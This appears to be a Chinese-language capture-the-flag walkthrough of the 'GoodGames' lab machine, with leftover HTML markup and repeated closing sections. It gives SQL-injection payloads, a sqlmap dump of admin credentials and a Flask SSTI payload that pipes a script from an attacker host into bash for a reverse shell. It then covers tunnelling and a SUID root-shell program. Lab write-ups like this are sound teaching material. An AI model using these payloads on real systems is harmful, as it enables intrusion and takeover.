GoodGames 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用masscan进行快速端口扫描：<\/p>

sudo masscan -p1-65535,U:1-65535 10.10.11.130 --rate=<\/span>1000<\/span> -p1-65535,U:1-65535 -e tun0 > \/tmp\/ports
<\/span><\/span><\/code><\/pre>使用nmap进行详细服务扫描：<\/p>
ports=<\/span>$(<\/span>cat \/tmp\/ports | awk -F " "<\/span> '{print $4}'<\/span> | awk -F "\/"<\/span> '{print $1}'<\/span> | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>nmap -Pn -sV -sC -p$ports 10.10.11.130
<\/span><\/span><\/code><\/pre>扫描结果显示：<\/p>

80\/tcp open http Apache httpd 2.4.51<\/li>
服务器头信息: Werkzeug\/2.0.2 Python\/3.9.2<\/li>
主机名: goodgames.htb<\/li>
<\/ul>
1.2 子域名枚举<\/h3>
使用ffuf进行子域名爆破：<\/p>
ffuf -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-5000.txt \
<\/span><\/span><\/span><\/span>-u http:\/\/FUZZ.goodgames.htb -H "Host: FUZZ.goodgames.htb"<\/span> -ac
<\/span><\/span><\/code><\/pre>发现内部管理子域名：<\/p>
echo '10.10.11.130 internal-administration.goodgames.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. SQL注入攻击<\/h2>
2.1 发现SQL注入点<\/h3>
在登录表单中发现SQL注入漏洞：<\/p>
email=1%40gmail.com'--+&password=123
email=1%40gmail.com'%20OR%20'1'='1'--+&password=123
<\/code><\/pre>
2.2 使用sqlmap自动化利用<\/h3>
创建请求文件(sqli)：<\/p>
POST \/login HTTP\/1.1
Host: goodgames.htb
Content-Type: application\/x-www-form-urlencoded

email=1%40gmail.com*&password=123
<\/code><\/pre>
使用sqlmap进行注入：<\/p>
sqlmap -r sqli -p email --batch
<\/span><\/span>sqlmap -r sqli -p email --batch -D main -T user --dump
<\/span><\/span><\/code><\/pre>获取到管理员凭据：<\/p>

email: admin@goodgames.htb<\/li>
username: admin<\/li>
password: superadministrator<\/li>
<\/ul>
3. Flask SSTI注入<\/h2>
3.1 访问内部管理面板<\/h3>
使用获取的凭据登录内部管理面板：<\/p>
http:\/\/internal-administration.goodgames.htb\/login
<\/code><\/pre>
3.2 发现SSTI漏洞<\/h3>
在设置页面测试模板注入：<\/p>
POST \/settings HTTP\/1.1
Host: internal-administration.goodgames.htb
Content-Type: application\/x-www-form-urlencoded

name={{9*9}}
<\/code><\/pre>
确认存在SSTI后，执行命令：<\/p>
name={{config.__class__.__init__.__globals__['os'].popen('curl%20http:\/\/10.10.16.16\/rev|bash').read()}}
<\/code><\/pre>
获取反向shell后找到user flag：<\/p>
388118f20c90df4d38744d9ac624dd43
<\/code><\/pre>
4. Docker逃逸提权<\/h2>
4.1 建立隧道<\/h3>
服务器端：<\/p>
chisel server -p 8000<\/span> --reverse
<\/span><\/span><\/code><\/pre>客户端：<\/p>
.\/chisel_1.10.1_linux_amd64 client 10.10.16.16:8000 R:localhost:1080:socks
<\/span><\/span><\/code><\/pre>4.2 网络探测<\/h3>
使用自定义脚本进行内网探测：<\/p>
.\/host_discovery.sh 172.19.0
<\/span><\/span><\/code><\/pre>发现172.19.0.1主机。<\/p>
4.3 SSH连接<\/h3>
通过代理连接：<\/p>
sudo proxychains -f 10.10.11.130.conf ssh augustus@172.19.0.1
<\/span><\/span><\/code><\/pre>4.4 创建SUID二进制文件<\/h3>
编写C程序：<\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    system("\/bin\/bash"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译并设置SUID：<\/p>
wget http:\/\/10.10.16.16\/suid.c
<\/span><\/span>gcc suid.c -o suid
<\/span><\/span>chmod u+s suid
<\/span><\/span><\/code><\/pre>执行获取root权限：<\/p>
.\/suid
<\/span><\/span><\/code><\/pre>获取root flag：<\/p>
a42c76fe28f8a2556fa7e8794f133c15
<\/code><\/pre>
5. 关键知识点总结<\/h2>


信息收集<\/strong>：masscan快速扫描+nmap详细扫描组合使用，子域名枚举技巧<\/p>
<\/li>

SQL注入<\/strong>：<\/p>

手工测试注入点<\/li>
sqlmap自动化利用<\/li>
数据提取技术<\/li>
<\/ul>
<\/li>

SSTI注入<\/strong>：<\/p>

Flask模板注入检测<\/li>
Python沙箱逃逸<\/li>
远程代码执行<\/li>
<\/ul>
<\/li>

Docker逃逸<\/strong>：<\/p>

内网探测技术<\/li>
隧道建立方法<\/li>
SUID提权技术<\/li>
<\/ul>
<\/li>

权限提升<\/strong>：<\/p>

编写SUID程序<\/li>
编译与权限设置<\/li>
本地提权执行<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防御建议<\/h2>

对用户输入进行严格过滤和参数化查询<\/li>
禁用或限制模板引擎的动态执行功能<\/li>
定期更新Docker和容器环境<\/li>
限制容器内用户的权限<\/li>
监控异常网络连接和特权操作<\/li>
<\/ol>

GoodGames 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. SQL注入攻击<\/h2>

3. Flask SSTI注入<\/h2>

4. Docker逃逸提权<\/h2>

6. 防御建议<\/h2> 对用户输入进行严格过滤和参数化查询<\/li> 禁用或限制模板引擎的动态执行功能<\/li> 定期更新Docker和容器环境<\/li> 限制容器内用户的权限<\/li> 监控异常网络连接和特权操作<\/li> <\/ol>

6. 防御建议<\/h2>

对用户输入进行严格过滤和参数化查询<\/li>
禁用或限制模板引擎的动态执行功能<\/li>
定期更新Docker和容器环境<\/li>
限制容器内用户的权限<\/li>
监控异常网络连接和特权操作<\/li> <\/ol>